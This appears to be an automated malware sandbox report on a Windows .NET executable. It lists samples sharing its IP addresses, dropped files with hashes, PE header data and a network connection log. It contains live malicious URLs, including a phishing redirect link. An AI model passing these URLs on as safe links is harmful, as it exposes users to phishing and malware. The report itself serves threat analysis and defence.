	http://minhaclaro.dtmmkt.com.br/effectivemail/redirecionaclique.aspx?idabordagem=5252932746&idlink=126090168=%0A66&endereco=//adelinox%E3%80%82com/temp/___S3Jpc3Rpbi5Eb2xhbkBhbWNuZXR3b3Jrcy5jb20=___bjddbxmjtj	Get hash	malicious	Unknown	Browse	23.1.237.91
	http://crdclub.cc	Get hash	malicious	HTMLPhisher	Browse	23.1.237.91
54328bd36c14bd82ddaa0c04b25ed9ad	SecuriteInfo.com.Variant.Zusy.541608.3032.24880.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	SecuriteInfo.com.Variant.Zusy.541608.3032.24880.exe	Get hash	malicious	Unknown	Browse	172.67.177.134
	https://my.visme.co/view/4d7g6z9q-niacon-limited-2	Get hash	malicious	Unknown	Browse	172.67.177.134
	https://docs.google.com/presentation/d/e/2PACX-1vSstUX7vy0kIERymrJMuxP0W8Z0Dla1vDO0XFFSrq3AKW9-vFwU686pY9sD6KEviEYrGYtSuxZEKo3K/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	172.67.177.134
	CNWSFY59Z6S1D.JS	Get hash	malicious	WSHRAT	Browse	172.67.177.134
	BmLue8t2V7.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	gZIZ5eyCtS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	edlyEKgpaz.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	PsBygexGwH.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	1.vbs	Get hash	malicious	AgentTesla	Browse	162.159.135.233 162.159.134.233
	New order -24900242 OP_pdf .exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	162.159.135.233 162.159.134.233
	FACT AZUR TJ .pdf.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	162.159.135.233 162.159.134.233
	MT103 Payment.vbs	Get hash	malicious	FormBook	Browse	162.159.135.233 162.159.134.233
	Po094847 Urgent .exe	Get hash	malicious	AgentTesla	Browse	162.159.135.233 162.159.134.233
	anXHkKikd6.exe	Get hash	malicious	Quasar	Browse	162.159.135.233 162.159.134.233
	SecuriteInfo.com.Variant.Marsilia.120335.22241.7512.exe	Get hash	malicious	Moneroocean Miner, Xmrig	Browse	162.159.135.233 162.159.134.233
	SecuriteInfo.com.Win32.TrojanX-gen.16521.31249.exe	Get hash	malicious	AgentTesla	Browse	162.159.135.233 162.159.134.233
	FACTURAS PENDIENTES.exe	Get hash	malicious	AgentTesla	Browse	162.159.135.233 162.159.134.233
	https://sanmarinoweekly.com/	Get hash	malicious	Unknown	Browse	162.159.135.233 162.159.134.233

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_MSBuild.exe_6f7dcd1940ace3d3d06544b01a852bbab5b6d4_9e133ab6_1cc90496-baf4-4257-a69f-6b76b5dbc299\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.1496618320480252
Encrypted:	false
SSDEEP:	192:5JiHfPWA04Fbo5aK5eOhleoroQzuiFSZ24lO8o:3SPWb45o5aCnjBoQzuiFSY4lO8o
MD5:	054547A5D75A5B638A348FD980BC693E
SHA1:	A38E6DD403C3A37DA75288BBD302464226A3AEF4
SHA-256:	DDEF37C9101F279101463AD170027FACB5A7B96D04C48F35EFB8DBAB29ED60E6
SHA-512:	D931489176B936113B2F9C4F3382677C62F8D704F6D74341C8EDC0744DBA8CC9755EEAC7EBC8F09EC980F2A96340C93E4C7E1BE9330600125B04EF810A0BB21E
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.7.3.0.1.5.5.6.7.9.9.0.9.3.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.7.3.0.1.5.5.7.3.7.7.2.1.6.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.c.c.9.0.4.9.6.-.b.a.f.4.-.4.2.5.7.-.a.6.9.f.-.6.b.7.6.b.5.d.b.c.2.9.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.6.8.9.3.2.c.3.-.8.3.7.0.-.4.a.e.3.-.a.f.8.4.-.2.a.3.f.e.2.0.c.8.c.f.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.M.S.B.u.i.l.d...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.5.0.-.0.0.0.1.-.0.0.1.4.-.0.9.6.6.-.4.a.2.f.f.3.8.b.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.c.6.d.8.8.d.b.3.c.6.8.7.1.b.3.b.b.7.f.9.b.a.9.b.d.e.8.9.3.b.f.c.a.c.7.c.7.e.e.4.!.M.S.B.u.i.l.d...e.x.e.....T.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2BA4.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Thu Apr 11 09:32:37 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	422383
Entropy (8bit):	3.4688146290044544
Encrypted:	false
SSDEEP:	3072:j1YUdtUyHx4vFsPlj8KYRbYcSTC0f4IoO1CCqFo3+v5dPak+T9Mh6lM+0:GUdpHxrjCbktqFo3Q5d0T9vla
MD5:	D63A28D6A4B786096EBBAF2B4E2FE22C
SHA1:	8EEC04EF6B17DF59351DCCB4A5295F43A83F3398
SHA-256:	19ED88C8A77FC74C0A06E96710D4670B15E12062794B278B881D82DA9D023C6C
SHA-512:	EAB36402C3374E417B34DF0761D051C1F143C47A0AAAB5BAB940AE1483F34F314DB116935BE387EE31DBC1EFFB758963F9CB7D74726229B522B99F7B477D25A5
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......5..f............................4.......<....#...........$.......4...s..........l.......8...........T............7..g:......................\|0..............................................................................eJ.......1......Lw......................T.......P...2..f.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D4B.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8684
Entropy (8bit):	3.70463961600181
Encrypted:	false
SSDEEP:	192:R6l7wVeJoiGG6Y9QUKHVgmf44dzprj89b+U6fmqm:R6lXJVX6YqTgmf44dK+5fS
MD5:	D769806EE35D5EDF3747FB498E120BD9
SHA1:	11B6B729E94597E542AB9D0613A1E86BFA248846
SHA-256:	E83EA7E0BB98265AB6067989DAA15DEA2AA09D303227BB045D6CA8F67FECD1EF
SHA-512:	291E43C3D3F1674A37ADC770214DBF81A5AEE9D2BA8EAB8E680BA5FF1F173B21E395B9E7F92682DF3186801983E464DE19BB784E67A2678C675BDC581DBC8ECB
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.1.2.8.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2D7B.tmp.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4710
Entropy (8bit):	4.48651973131772
Encrypted:	false
SSDEEP:	48:cvIwWl8zs8Jg771I9WpWpW8VYAPYm8M4JsNsF6yq85ApTB2hZuAd:uIjf6I7RY7VRSJsZlGhZuAd
MD5:	BD6C7A431D32BB713E13BA769CB3AEAD
SHA1:	4644C733E41E12B8861782AD3EBF7AE841983B2E
SHA-256:	D559E1EE051B2352BCDA52FB39A906F6AA06D89F89FD822E223EEB0023A089F2
SHA-512:	9892F078F47C173C80C87E594D9FB69B069D8BDE81FF2B70B8560AB8460490BC1E15A854BA07867924B59874A1DE5448C6FC86A30A3D98D85ED2F380D5CC5B57
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="275075" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\MSBuild.exe.log

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1510
Entropy (8bit):	5.380493107040482
Encrypted:	false
SSDEEP:	24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
MD5:	EC75759911B88E93A2B5947380336033
SHA1:	4D1472BBA520DBF76449567159CD927E94454210
SHA-256:	5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
SHA-512:	EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Pnihosiyvr.exe.log

Download File

Process:	C:\Users\user\Desktop\Pnihosiyvr.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs0E4KD:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIA
MD5:	183D606A476307F9B728A16FDAD71253
SHA1:	517F674A9E8149E92B47C5F7A78D4474AFBCE6E8
SHA-256:	38EAF5F7C03D3BD8D1DAEE6F3775E5CE6E2707F8BF1ED90F25F80EAC436B94A9
SHA-512:	C67722C04B00260D09CACE2CA7FD10E007E1C1CDE5E07D9DBA3D6CD42FF15624D47EFFD9C282DB75180E4691C8E14BC097BF8BCBD91BB7AC9DAECE99A6402845
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sssssssssssssssss.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\sssssssssssssssss.exe
File Type:	CSV text
Category:	dropped
Size (bytes):	1281
Entropy (8bit):	5.370111951859942
Encrypted:	false
SSDEEP:	24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNt1qE4GIs0E4KD:MxHKQwYHKGSI6oPtHTHhAHKKkt1qHGIA
MD5:	183D606A476307F9B728A16FDAD71253
SHA1:	517F674A9E8149E92B47C5F7A78D4474AFBCE6E8
SHA-256:	38EAF5F7C03D3BD8D1DAEE6F3775E5CE6E2707F8BF1ED90F25F80EAC436B94A9
SHA-512:	C67722C04B00260D09CACE2CA7FD10E007E1C1CDE5E07D9DBA3D6CD42FF15624D47EFFD9C282DB75180E4691C8E14BC097BF8BCBD91BB7AC9DAECE99A6402845
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567f

C:\Users\user\AppData\Roaming\sssssssssssssssss.exe

Download File

Process:	C:\Users\user\Desktop\Pnihosiyvr.exe
File Type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	209408
Entropy (8bit):	6.026811281161417
Encrypted:	false
SSDEEP:	6144:+xtcH8wnwvb4ZtARZ9FnsZNcRrGS/qaj:+xSH8wybYtARZLLGeXj
MD5:	99C80808C736D6FD95EA79E6BFE081B1
SHA1:	D275A3FACF1C4A420EF8B9A66A400F3A4643580D
SHA-256:	AA511F2AACC4E1166AE02E6FA9FEB4F9F5F76583A040E9681781DBB79FE582C4
SHA-512:	7611D80966D050A034795E9BAF19263C0A73B81CFD6E6544C6392EE0C1EFBA000E1E089A0DACD368190F82D169BFE3544C1678F908EDD323F7443AE62406CE7F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 39% Antivirus: Virustotal, Detection: 56%, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...a2.f.........."..........h........... ....@...... ....................................`..............................................................h........................................................................................... ..H............text...`.... ...................... ..`.rsrc....h.......h..................@..@........................................H........\|...i..........Xh..h............................................0..........(......0.....................1...26..2...2...0....(....+%..(....+...0....(....+...(....+...X.X(......&.......................1...../....X..X..8r......2....<V....s.... .x..(....(......s........ D~..(....(.... [q..(....(....o......s........s...........s..........o......o..........,...o.........,...o.........,...o.......&.[...(......o....o.........+5............. Tq..(.... .......o............&.....X..

C:\Users\user\AppData\Roaming\sssssssssssssssss.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\Pnihosiyvr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.422348887164746
Encrypted:	false
SSDEEP:	6144:cSvfpi6ceLP/9skLmb0OTHWSPHaJG8nAgeMZMMhA2fX4WABlEnNy0uhiTw:HvloTHW+EZMM6DFy803w
MD5:	19B7418FC9B7BB183C31AF4286EF573C
SHA1:	707D2361DD876F6530C3814BCE24E76161AE25EC
SHA-256:	914261D4CFCF95D7D4BBDD67BD2EF9D67BC4ABF28A8CD5DDB6CBFC5F52FD22C3
SHA-512:	13A63652473BAD4F78E546EB411187DE9426E9CEA9B4AB6E80872D2BB6B3B19577344E4BB8E4B05F58F6E30929C9C320E0EE374A38A523F572B03EF59348FE14
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..n0.................................................................................................................................................................................................................................................................................................................................................x.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
Entropy (8bit):	6.026811281161417
TrID:	Win64 Executable GUI Net Framework (217006/5) 49.88% Win64 Executable GUI (202006/5) 46.43% Win64 Executable (generic) (12005/4) 2.76% Generic Win/DOS Executable (2004/3) 0.46% DOS Executable Generic (2002/1) 0.46%
File name:	Pnihosiyvr.exe
File size:	209'408 bytes
MD5:	99c80808c736d6fd95ea79e6bfe081b1
SHA1:	d275a3facf1c4a420ef8b9a66a400f3a4643580d
SHA256:	aa511f2aacc4e1166ae02e6fa9feb4f9f5f76583a040e9681781dbb79fe582c4
SHA512:	7611d80966d050a034795e9baf19263c0a73b81cfd6e6544c6392ee0c1efba000e1e089a0dacd368190f82d169bfe3544c1678f908edd323f7443ae62406ce7f
SSDEEP:	6144:+xtcH8wnwvb4ZtARZ9FnsZNcRrGS/qaj:+xSH8wybYtARZLLGeXj
TLSH:	7B244B11BB8CCB26CEDD02FCA16B063897BCC1D26543E34B2D8598FB2C5379B59065E9
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d...a2.f.........."..........h........... ....@...... ....................................`................................

File Icon


Icon Hash:	13b8eea45a4f3b0e

Static PE Info

General

Entrypoint:	0x400000
Entrypoint Section:
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x66163261 [Wed Apr 10 06:32:01 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
dec ebp
pop edx
nop
add byte ptr [ebx], al
add byte ptr [eax], al
add byte ptr [eax+eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x30000	0x6800	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2000	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x2c660	0x2c800	1a3244ae96d1bcb88a0eeea2bee5644b	False	0.47215699613764045	data	6.106493496286094	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x30000	0x6800	0x6800	2d541052b38de1228a2938e06d4be60a	False	0.47836538461538464	data	4.958901914817803	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x301a0	0x1000	Device independent bitmap graphic, 48 x 96 x 8, image size 0	0.564208984375
RT_ICON	0x311b0	0xa00	Device independent bitmap graphic, 32 x 64 x 8, image size 0	0.65078125
RT_ICON	0x31bc0	0x600	Device independent bitmap graphic, 16 x 32 x 8, image size 0	0.5390625
RT_ICON	0x321d0	0x2600	Device independent bitmap graphic, 48 x 96 x 32, image size 0	0.4198190789473684
RT_ICON	0x347e0	0x1200	Device independent bitmap graphic, 32 x 64 x 32, image size 0	0.5026041666666666
RT_ICON	0x359f0	0x600	Device independent bitmap graphic, 16 x 32 x 32, image size 0	0.515625
RT_GROUP_ICON	0x36000	0x5a	data	0.6666666666666666
RT_VERSION	0x3606a	0x3d2	data	0.43558282208588955
RT_MANIFEST	0x3644c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 11, 2024 11:31:59.287508011 CEST	49675	443	192.168.2.5	23.1.237.91
Apr 11, 2024 11:31:59.318627119 CEST	49674	443	192.168.2.5	23.1.237.91
Apr 11, 2024 11:31:59.443725109 CEST	49673	443	192.168.2.5	23.1.237.91
Apr 11, 2024 11:32:01.274157047 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.274203062 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.274288893 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.324429989 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.324474096 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.516289949 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.516585112 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.519232035 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.519257069 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.519785881 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.568737984 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.577596903 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.620269060 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.933672905 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.933947086 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934031963 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934111118 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934127092 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.934163094 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934181929 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.934259892 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934313059 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.934319973 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934396982 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934458971 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.934470892 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934546947 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934612036 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.934623003 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934714079 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934772015 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.934782028 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934865952 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.934922934 CEST	49704	443	192.168.2.5	162.159.135.233
Apr 11, 2024 11:32:01.934932947 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.935025930 CEST	443	49704	162.159.135.233	192.168.2.5
Apr 11, 2024 11:32:01.935079098 CEST	49704	443	192.168.2.5	162.159.135.233
